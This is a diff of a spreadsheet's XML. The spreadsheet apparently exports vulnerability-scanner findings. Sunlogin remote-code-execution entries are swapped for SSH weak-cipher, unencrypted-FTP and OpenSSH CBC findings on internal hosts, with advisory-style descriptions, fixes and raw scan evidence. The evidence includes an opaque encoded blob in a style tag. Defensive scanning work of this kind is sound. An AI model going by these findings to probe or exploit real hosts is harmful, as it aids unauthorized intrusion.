&gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X14" t="inlineStr">
@@ -2454,7 +2046,7 @@
     <row r="15">
       <c r="A15" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>SSH 弱加密算法支持</t>
         </is>
       </c>
       <c r="B15" t="inlineStr">
@@ -2469,28 +2061,27 @@
       </c>
       <c r="D15" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>加密问题</t>
         </is>
       </c>
       <c r="E15" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>修改 SSH 配置文件，删除arcfour、arcfour128、arcfour256等弱加密算法，添加以下内容：“Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc”，保存文件后重启 SSH 服务。或者升级 openssh 版本为最新版本。</t>
         </is>
       </c>
       <c r="F15" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>远程 SSH 服务器默认配置，对 MD5 或 96 位 MAC 算法提供支持，这两者都被认为是弱算法。请注意，此插件仅检查 SSH 服务器选项，不检查有漏洞的软件版本</t>
         </is>
       </c>
       <c r="G15" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H15" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I15" t="inlineStr">
@@ -2501,22 +2092,22 @@
       <c r="J15" t="inlineStr"/>
       <c r="K15" t="inlineStr">
         <is>
-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L15" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M15" t="inlineStr">
         <is>
-          <t>192.168.50.98</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N15" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O15" t="inlineStr">
@@ -2533,15 +2124,19 @@
       </c>
       <c r="S15" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T15" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U15" t="inlineStr"/>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U15" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:22</t>
+        </is>
+      </c>
       <c r="V15" t="inlineStr">
         <is>
           <t>未知</t>
@@ -2549,29 +2144,9 @@
       </c>
       <c r="W15" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:22
+请求体: -
+响应体: -</t>
         </is>
       </c>
       <c r="X15" t="inlineStr">
@@ -2588,43 +2163,42 @@
     <row r="16">
       <c r="A16" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>SSH服务器支持的算法发现</t>
         </is>
       </c>
       <c r="B16" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C16" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>低危</t>
         </is>
       </c>
       <c r="D16" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>信息发现</t>
         </is>
       </c>
       <c r="E16" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>无影响</t>
         </is>
       </c>
       <c r="F16" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>用来获取SSH服务器支持的算法列表</t>
         </is>
       </c>
       <c r="G16" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H16" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I16" t="inlineStr">
@@ -2635,17 +2209,17 @@
       <c r="J16" t="inlineStr"/>
       <c r="K16" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L16" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M16" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N16" t="inlineStr">
@@ -2658,11 +2232,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P16" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P16" t="inlineStr"/>
       <c r="Q16" t="inlineStr"/>
       <c r="R16" t="inlineStr">
         <is>
@@ -2676,10 +2246,14 @@
       </c>
       <c r="T16" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U16" t="inlineStr"/>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U16" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:22</t>
+        </is>
+      </c>
       <c r="V16" t="inlineStr">
         <is>
           <t>未知</t>
@@ -2687,29 +2261,9 @@
       </c>
       <c r="W16" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:22
+请求体: -
+响应体: -</t>
         </is>
       </c>
       <c r="X16" t="inlineStr">
@@ -2726,7 +2280,7 @@
     <row r="17">
       <c r="A17" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>未加密的FTP协议</t>
         </is>
       </c>
       <c r="B17" t="inlineStr">
@@ -2741,28 +2295,27 @@
       </c>
       <c r="D17" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E17" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>通过AUTH TLS开启FTPS</t>
         </is>
       </c>
       <c r="F17" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>远程主机的FTP服务允许使用未加密FTP</t>
         </is>
       </c>
       <c r="G17" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H17" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I17" t="inlineStr">
@@ -2773,22 +2326,22 @@
       <c r="J17" t="inlineStr"/>
       <c r="K17" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L17" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M17" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N17" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O17" t="inlineStr">
@@ -2796,11 +2349,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P17" t="inlineStr">
-        <is>
-          <t>子组名</t>
-        </is>
-      </c>
+      <c r="P17" t="inlineStr"/>
       <c r="Q17" t="inlineStr"/>
       <c r="R17" t="inlineStr">
         <is>
@@ -2809,15 +2358,19 @@
       </c>
       <c r="S17" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T17" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U17" t="inlineStr"/>
+          <t>21</t>
+        </is>
+      </c>
+      <c r="U17" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:21</t>
+        </is>
+      </c>
       <c r="V17" t="inlineStr">
         <is>
           <t>未知</t>
@@ -2825,29 +2378,10 @@
       </c>
       <c r="W17" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:21
+请求体: -
+响应体: -
+举证描述: 构造无授权的ftp请求，成功读取ftp文件，检测存在漏洞</t>
         </is>
       </c>
       <c r="X17" t="inlineStr">
@@ -2864,43 +2398,42 @@
     <row r="18">
       <c r="A18" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>ftp banner信息获取</t>
         </is>
       </c>
       <c r="B18" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C18" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>低危</t>
         </is>
       </c>
       <c r="D18" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>信息发现</t>
         </is>
       </c>
       <c r="E18" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>非漏洞</t>
         </is>
       </c>
       <c r="F18" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>此插件用来获取ftp服务的banner信息</t>
         </is>
       </c>
       <c r="G18" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H18" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I18" t="inlineStr">
@@ -2911,22 +2444,22 @@
       <c r="J18" t="inlineStr"/>
       <c r="K18" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L18" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M18" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N18" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O18" t="inlineStr">
@@ -2934,11 +2467,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P18" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P18" t="inlineStr"/>
       <c r="Q18" t="inlineStr"/>
       <c r="R18" t="inlineStr">
         <is>
@@ -2947,15 +2476,19 @@
       </c>
       <c r="S18" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T18" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U18" t="inlineStr"/>
+          <t>21</t>
+        </is>
+      </c>
+      <c r="U18" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:21</t>
+        </is>
+      </c>
       <c r="V18" t="inlineStr">
         <is>
           <t>未知</t>
@@ -2963,29 +2496,10 @@
       </c>
       <c r="W18" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:21
+请求体: -
+响应体: -
+举证描述: 成功获取ftp的banner信息</t>
         </is>
       </c>
       <c r="X18" t="inlineStr">
@@ -3002,43 +2516,43 @@
     <row r="19">
       <c r="A19" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH cbc模式信息泄露漏洞(CVE-2008-5161)</t>
         </is>
       </c>
       <c r="B19" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C19" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>低危</t>
         </is>
       </c>
       <c r="D19" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E19" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：
+https://downloads.ssh.com/</t>
         </is>
       </c>
       <c r="F19" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。如果配置为CBC模式的话，OpenSSH没有正确地处理分组密码算法加密的SSH会话中所出现的错误，导致可能泄露密文中任意块最多32位纯文本。在以标准配置使用OpenSSH时，攻击者恢复32位纯文本的成功概率为2^{-18}，此外另一种攻击变种恢复14位纯文本的成功概率为2^{-14}。</t>
         </is>
       </c>
       <c r="G19" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H19" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I19" t="inlineStr">
